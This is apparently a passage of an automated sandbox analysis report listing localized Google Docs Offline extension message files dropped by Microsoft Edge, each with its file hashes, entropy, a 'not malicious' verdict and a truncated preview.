Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1658
Entropy (8bit):4.294833932445159
Encrypted:false
SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
MD5:BC7E1D09028B085B74CB4E04D8A90814
SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:false
Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1672
Entropy (8bit):4.314484457325167
Encrypted:false
SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):935
                                                                                                                                                            Entropy (8bit):4.6369398601609735
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                            MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                            SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                            SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                            SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1065
                                                                                                                                                            Entropy (8bit):4.816501737523951
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                            MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                            SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                            SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                            SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2771
                                                                                                                                                            Entropy (8bit):3.7629875118570055
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                            MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                            SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                            SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                            SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):858
                                                                                                                                                            Entropy (8bit):4.474411340525479
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                            MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                            SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                            SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                            SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):954
                                                                                                                                                            Entropy (8bit):4.6457079159286545
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                            MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                            SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                            SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                            SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):899
                                                                                                                                                            Entropy (8bit):4.474743599345443
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                            MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                            SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                            SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                            SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2230
                                                                                                                                                            Entropy (8bit):3.8239097369647634
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                            MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                            SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                            SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                            SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1160
                                                                                                                                                            Entropy (8bit):5.292894989863142
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                            MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                            SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                            SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                            SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):3264
Entropy (8bit):3.586016059431306
Encrypted:false
SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
MD5:83F81D30913DC4344573D7A58BD20D85
SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:false
Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):3235
Entropy (8bit):3.6081439490236464
Encrypted:false
SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
MD5:2D94A58795F7B1E6E43C9656A147AD3C
SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:false
Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):3122
Entropy (8bit):3.891443295908904
Encrypted:false
SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:false
Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1895
Entropy (8bit):4.28990403715536
Encrypted:false
SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
MD5:38BE0974108FC1CC30F13D8230EE5C40
SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
Malicious:false
Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1042
Entropy (8bit):5.3945675025513955
Encrypted:false
SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
MD5:F3E59EEEB007144EA26306C20E04C292
SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:false
Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2535
Entropy (8bit):3.8479764584971368
Encrypted:false
SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:E20D6C27840B406555E2F5091B118FC5
SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:false
